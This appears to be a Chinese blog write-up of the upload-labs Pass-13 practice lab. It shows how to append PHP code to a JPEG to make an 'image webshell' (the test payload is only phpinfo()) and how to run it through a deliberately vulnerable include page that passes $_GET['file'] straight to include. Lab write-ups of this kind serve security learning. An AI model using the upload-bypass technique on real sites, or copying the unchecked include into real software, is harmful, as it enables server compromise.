文件包含-Uploadlabs-pass13关卡测试

最新推荐文章于 2024-06-18 12:07:30 发布
最新推荐文章于 2024-06-18 12:07:30 发布
阅读量673 收藏 1
点赞数 1
分类专栏: PHP 网络安全 渗透测试 文章标签: php web 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19446965/article/details/118662677
版权
网络安全 同时被 3 个专栏收录
33 篇文章 8 订阅
订阅专栏
渗透测试
18 篇文章 4 订阅
订阅专栏
PHP
3 篇文章 0 订阅
订阅专栏

图片一句话制作方法

copy 1.png /b + shell.php /a webshell.jpg

test13.php:

<?php
phpinfo();
?>

test1.jpg

C:\Users\Rnanprince\Desktop\学习文档>copy test1.jpg/b + test13.php/a webshell.jpg
test1.jpg
已复制         1 个文件。

生成文件 :

 打开文件末尾有:

 上传:

打开

 

抓包看,能够解析出来其中的webshell代码

但是没有触发包含的脚本

应该是无法解析图片的原因

所以根据题目一开始的提示,要使用文件包含漏洞

在www/upload-labs/upload目录下建立一个php文件:

 代码如下:

<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}

 

然后我上传的文件被重命名为7020210712000327.jpg,所以跳转到如下url

http://192.168.77.128:8083/upload-labs/upload/include.php?file=7020210712000327.jpg

就可以解析出如下页面(和抓包里面看到的一样)

 

 

Rnan-prince
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vfio-pci-passthrough
01-05
1. What is VFIO/IOMMU? Why want them? 2. VFIO – qemu part code 3. VFIO – kernel part code 4. VFIO usage: how to passthrough a pci device
GPU-Passthrough-Arch-Linux-to-Windows10:GPU Passthrough 和 virt-manager 演练
08-04
来自 Arch Linux 的 GPU Passthrough问题如果您对这些步骤有任何问题,请联系我,我会尽力修复它们!结合这些来源: 何时执行此操作: 当您想从拱形盒中玩 Windows 10 视频游戏时,因为: wangblows 并且您可以访问 ...
upload-labs通关思路及文件上传总结
qq_73767109的博客
05-11 1092
关卡遇到一系列问题的解决方案 文件上传总结 服务器特性总结 upload-labs解题详细思路
upload-labs】图片马绕过pass13~16
qq_43665434的博客
03-21 1898
upload-labs】图片马绕过pass13~16 【pass-13】文件头检查绕过 1、源码分析 function getReailFileType($filename){ $file = fopen($filename, "rb"); //以字节流的形式打开上传的文件 $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); //unpack()解包
upload-labs第十三关教程
最新发布
Estera的博客
06-18 624
将可控参数那块加入eval.php空格—>选择hex模块—>找到eval.php的位置—>修改空格的十六进制为00。/upload/eval.php%00进行手动解码,快捷键ctrl+shift+u。这个是一个php代码,然后保存为png文件就行了。需要注意的是:eval.php背后的一大串会被截断。修改之前和上面的一样。
upload-labs:pass-13
羽的博客
07-09 187
$is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); if(in_array($file_ext,$ext_arr)){ ...
upload-labs详解1-19关通关全解(最全最详细一看就会)
热门推荐
qq_53003652的博客
04-05 2万+
upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包含着不同上传方式。
文件上传漏洞原理与实战——upload-labs靶场(2)
weixin_52180702的博客
07-07 517
文件上传漏洞 upload-labs靶场
AZ-305 775code PASS.zip
04-02
【标题】"AZ-305 775code PASS.zip" 暗示这是一个与AZ-305认证相关的学习资源,其中包含了帮助考生通过考试的代码或资料。AZ-305是微软Azure解决方案架构师专家认证的一项考试,重点考察设计和实施云解决方案的能力...
react-native-passkit-wallet:React Native模块处理PassKit
05-11
react-native-passkit-wallet React Native模块处理PassKit传递。安装1.从npm安装库npm install --save react-native-passkit-wallet2.链接本机代码您可以按照自己喜欢的方式链接本机代码:可可豆在Podfile中的项目...
auth-source-pass:将Emacs的auth-source与密码存储集成
02-05
为了使`auth-source`能够找到`pass`,还需要配置相关设置,例如设置`pass`的可执行文件路径: ```lisp (setq auth-source-pass-program "/usr/bin/pass") ``` 配置完成后,重启Emacs,现在`auth-source`就可以访问...
【渗透测试】文件上传漏洞:upload-labs通关简记
weixin_53972936的博客
10-24 2938
文件上传漏洞的成因(复杂),一方面,Web应用开放了文件上传功能,并且对上传的文件没有进行足够的限制;另一方面,程序开发部署时候,没有考虑到系统特性和过滤不严格;再者就是,攻击者通过Web服务器解析漏洞绕过限制,导致可以上传任意文件。
upload-labs第13关~20关详细解析
Lucky小小吴的小屋
02-13 1584
二次渲染是这一关的最大特点,将上传的文件重新生成为新的文件,这很容易出现“图片马被打乱,重新生成一张普通的jpg文件”四个文件:一句话木马php文件+一张jgp格式照片+包含一句话木马的jpg照片shell_jpg+.py文件。后面,我尝试直接用图片马上传,发现没有二次渲染~~ ,直接用AntSword连接图片马,成功了。后面了解到了,直接将php代码段插入到一个图片里,对于jpg不太显示,jpg不稳定。我发现用普通的图片马+自带的文件包含,就可以实现文件上传漏洞。不行,直接被拦截了,这里会显示一片空白。
文件上传靶场upload-labs通关
p36273的博客
07-03 2710
upload-labs是一个专门用来练习文件上传的靶场一共20关,现在,我们开始通关吧。
upload-labs Pass-13
qq_62673514的博客
02-27 168
upload-labs pass-12通过方法
Upload-labs文件上传漏洞(图片马)——Pass13
Zichel77的博客
07-28 8407
0×00 题目概述 0×01 源代码 function getReailFileType($filename){ $file = fopen($filename, "rb"); $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); $typeCode = intval($strInfo['chars1'].$strInfo['char
文件上传--Upload-labs--Pass13&&14&&15--图片马
2302_79800344的博客
02-19 661
图片马
[网络安全]upload-labs Pass-13 解题详析
等风来
08-15 4138
以上为[网络安全]upload-labs Pass-13 解题详析,后续将分享[网络安全]xss-labs Pass-14 解题详析。我是秋说,我们下次见。
upload-labs靶场学习笔记1-21关
qq_56426046的博客
08-27 1905
服务器端使用白名单防御,修复 web 中间件的漏洞,禁止客户端存在可控参 数,存放文件目录禁止脚本执行,限制后缀名 一定要设置图片格式 jpg、gif 、 png 文件名随机的,不可预测。
slua assembly-csharp-editor-firstpass.dll
10-16
slua assembly-csharp-editor-firstpass.dll是由SLua插件生成的一个扩展库文件,用于支持将Lua代码与C#代码进行交互。SLua是一个在Unity游戏引擎中使用的,用于将Lua脚本与C#代码相结合的工具。在Unity中,可以使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值